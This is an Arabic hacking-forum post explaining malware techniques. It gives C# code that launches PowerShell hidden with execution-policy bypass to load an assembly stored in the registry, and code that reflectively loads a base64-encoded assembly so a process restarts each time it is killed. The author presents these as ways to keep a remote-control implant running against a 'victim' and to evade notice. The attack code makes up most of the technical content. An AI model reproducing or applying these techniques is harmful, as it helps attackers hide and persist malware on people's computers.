15.01.2018 عودة العملية للعمل بعد قتلها & اخفاء الباورشيل - الكوماند لاين بدون اللجوء ل Process


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,620
3,576
1
الفكرة باختصار انني شفت بموقع pinvoke المخص بدوال api
استخدام الشيل اكسكيوت كالتالي




فقلت هذا بديل جيد جدا للاستغناء عن Process واخفاء الباور شيل او الكوماند لاين عن طريقها
يعني مثلا لاخفاء الباور شيل وتمرير كوماند له هنا

C#:
ShellExecute(0, @"open", @"powershell", @"-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\bashar).bachir).EntryPoint.Invoke($null,$null)", @"",0);
حيث البارامتر 0 للاحفاء و 5 لجعله ظاهرا ,,
لهنا عندنا موضوع وحكينا عنه بس القسم الثاني من الموضوع هو
انه قلت ليش مابخليه يشغل الاسمبلي نفسه الشغال .!
وبخلي هالاسمبلي مابيشتغل بدون انه مايتمرر له بارامتر سترينج
يعني رح اعمل نقطة ادخال ورح حدد السترينج على اساس انه العنصر الاول بمصفوفة السترينج
C#:
args[0]
يعني بالعادة بتمر تمرير البارامتر من خارج الاسمبلي للاسمبلي عشان يشتغل
انا لا قمت بتمرير البارامتر من داخل الاسمبلي وهو قيم البيس 64 سترينج
يعني عملت نقطة ادخال بدون قيم بيس64 وحطيت القيم على اساس انها مثل ماقلت البارامتر المستقبل
C#:
Interaction.CallByName(Interaction.CallByName(Type.GetType("System.Reflection.Assembly")?.GetMethod("Load", new[] { typeof(byte[]) })
?.Invoke(null, new[] { Type.GetType("System.Convert")?.GetMethod("FromBase64String", new []{typeof(string)})?.Invoke(null, new object[]
{args[0]  }) }) ?? throw new InvalidOperationException(),
"EntryPoint", CallType.Get), "Invoke", CallType.Method, 10000000 - 10000000, null);
وقبل نقطة الادخال مررت القيم للاسمبلي نفسه عشان يشتغل
C#:
ShellExecute(0, @"open", Application.ExecutablePath, @"TVqQAAMAAAAEAAAA//8AALgAA", @"", 0);
النتيجة رح ينعطب الملف عند التشغيل بس رح يشتغل هه
كيف مافهمت .؟ شوف الفديو
الملف بيشتغل كأنه معطوب وتم اغلاقه وبيظهر لك رسالة بهالشي
بس حقيقة هوة يعمل والتبليغ شغال وعند قتل العملية حتى من المتحكم
او من قبل الضحية رح يرجع يشتغل الاسمبلي ولو تم قتله عشرات المرات ,,
شوف الفديو عشان تفهم الموضوع باكمله
ملاحظة لاتجرب الطريقة على الويندوز الاصلي جربه على الوهمي
لان مارح تقدر تقتل العملية لازم انك تعمل اعادة تشغيل ههه
وماتغلط وتحط تثبيت ببدء التشغيل وقت التجريب عشان ماترجع تشتغل
وترجع تحذف المفتاح من بدء التشغيل
وتعمل ريستارت جديد حتى تخلص من الملف ههه
حمل الفديو من هنا
https://drive.google.com/file/d/15LZt4m9jra1Og5Qr_YcU72MrlIUvgsiZ/view?usp=sharing

 

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك